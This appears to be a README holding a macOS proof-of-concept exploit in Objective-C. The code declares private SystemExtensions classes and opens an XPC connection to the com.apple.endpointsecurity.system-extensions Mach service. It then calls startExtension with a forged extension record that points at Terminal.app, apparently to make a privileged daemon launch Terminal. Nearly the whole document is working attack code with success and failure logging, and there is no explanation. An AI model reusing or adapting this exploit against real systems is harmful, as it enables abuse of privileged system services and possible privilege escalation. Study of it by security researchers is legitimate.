README.md
Rendering markdown...
#import <Foundation/Foundation.h>
#include <dlfcn.h>
@protocol OSSystemExtensionPolicyItem
@property(readonly) BOOL modified;
@property BOOL enabled;
@property(readonly) BOOL rebootRequired;
@property(readonly) NSURL *containingAppURL;
@property(readonly) NSURL *stagedBundleURL;
@property(readonly) NSString *bundleVersion;
@property(readonly) NSString *shortVersionString;
@property(readonly) BOOL teamIDNone;
@property(readonly) BOOL teamIDPlatformBinary;
@property(readonly) NSString *teamID;
@property(readonly) NSString *usageDescription;
@property(readonly) NSString *developerName;
@property(readonly) NSString *applicationName;
@property(readonly) NSString *extensionDisplayName;
@property(readonly) NSString *identifier;
@end
@interface OSSystemExtensionInfo : NSObject <NSSecureCoding, OSSystemExtensionPolicyItem>
{
BOOL _enabled;
NSDictionary *_localizedInfo;
NSDictionary *_unlocalizedInfo;
BOOL _teamIDPlatformBinary;
BOOL _teamIDNone;
BOOL _active;
BOOL _rebootRequired;
BOOL _modified;
NSString *_identifier;
NSString *_developerName;
NSArray *_categoryIdentifiers;
NSString *_owningCategoryIdentifier;
NSString *_teamID;
NSString *_shortVersionString;
NSString *_bundleVersion;
NSURL *_containingAppURL;
NSURL *_stagedBundleURL;
NSString *_stagedCdhash;
NSString *_stateString;
NSDictionary *_additionalLaunchdPlistEntries;
}
+ (BOOL)supportsSecureCoding;
@property BOOL modified;
@property BOOL rebootRequired;
@property(retain) NSDictionary *additionalLaunchdPlistEntries;
@property(retain) NSString *stateString;
@property BOOL active;
@property(retain) NSString *stagedCdhash;
@property(retain) NSURL *stagedBundleURL;
@property(retain) NSURL *containingAppURL;
@property(retain) NSString *bundleVersion;
@property(retain) NSString *shortVersionString;
@property BOOL teamIDNone;
@property BOOL teamIDPlatformBinary;
@property(retain) NSString *teamID;
@property(retain) NSString *owningCategoryIdentifier;
@property(retain) NSArray *categoryIdentifiers;
@property(retain) NSString *developerName;
@property(retain) NSString *identifier;
@property(readonly) NSString *usageDescription;
@property(readonly) NSString *extensionDisplayName;
- (id)getLocalizedStringForKey:(id)arg1;
@property(readonly) NSString *applicationName;
@property BOOL enabled;
- (void)encodeWithCoder:(id)arg1;
- (id)initWithCoder:(id)arg1;
- (id)initWithXPCDictionary:(id)arg1;
@end
@protocol _OSSystemExtensionPointInterface <NSObject>
- (void)terminateExtension:(OSSystemExtensionInfo *)arg1 replyHandler:(void (^)(NSError *))arg2;
- (void)startExtension:(OSSystemExtensionInfo *)arg1 replyHandler:(void (^)(NSError *))arg2;
- (void)willReplaceExtension:(OSSystemExtensionInfo *)arg1 withExtension:(OSSystemExtensionInfo *)arg2 replyHandler:(void (^)(NSError *))arg3;
- (void)willUninstallExtension:(OSSystemExtensionInfo *)arg1 replyHandler:(void (^)(NSError *))arg2;
- (void)willTerminateExtension:(OSSystemExtensionInfo *)arg1 replyHandler:(void (^)(NSError *))arg2;
- (void)willStartExtension:(OSSystemExtensionInfo *)arg1 replyHandler:(void (^)(NSError *))arg2;
- (void)validateExtension:(OSSystemExtensionInfo *)arg1 atTemporaryBundleURL:(NSURL *)arg2 replyHandler:(void (^)(NSDictionary *, NSError *))arg3;
@end
#define machServiceName @"com.apple.endpointsecurity.system-extensions"
void *systemExt;
int main(void){
NSLog(@"[!] Attemping to load SystemExtensions for OSSystemExtensionInfoClass");
systemExt = dlopen("/System/Library/Frameworks/SystemExtensions.framework/Versions/Current/SystemExtensions", RTLD_LAZY);
if(systemExt == NULL)
{
NSLog(@"[-] Failed to: Load SystemExtensions framework");
exit(-1);
}
NSLog(@"[+] SystemExtensions Loaded");
Class OSSystemExtensionInfoClass = nil;
NSLog(@"[+] Obtaining OSSystemExtensionInfo");
OSSystemExtensionInfoClass = NSClassFromString(@"OSSystemExtensionInfo");
if (OSSystemExtensionInfoClass == nil)
{
NSLog(@"[-] Failed to: obtain OSSystemExtensionInfo class");
exit(-1);
}
OSSystemExtensionInfo *info = [[OSSystemExtensionInfoClass alloc] init];
info.stagedBundleURL = [NSURL fileURLWithPath:@"/System/Applications/Utilities/Terminal.app"];
NSLog(@"[+] stagedBundleURL set to /System/Applications/Utilities/Terminal.app");
info.identifier = @"com.apple.Terminal";
NSLog(@"[+] identifier set to com.apple.Terminal");
NSLog(@"[+] Setting Up XPC for %@", machServiceName);
NSXPCConnection* connection = [[NSXPCConnection alloc] initWithMachServiceName:machServiceName options:0x1000];
NSXPCInterface* interface = [NSXPCInterface interfaceWithProtocol:@protocol(_OSSystemExtensionPointInterface)];
[connection setRemoteObjectInterface:interface];
[connection resume];
id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError* error){
NSLog(@"[-] Error: %@", error);
exit(-1);
}];
NSLog(@"[+] Object: %@", obj);
NSLog(@"[+] Connection: %@", connection);
[obj startExtension:info replyHandler:^void(NSError *error){
if(error != nil){
NSLog(@"[-] Calling StartExtention failed: %@", error);
exit(-1);
}
}];
[NSThread sleepForTimeInterval:10.0f];
NSLog(@"[+] Executed startExtension to start Terminal");
}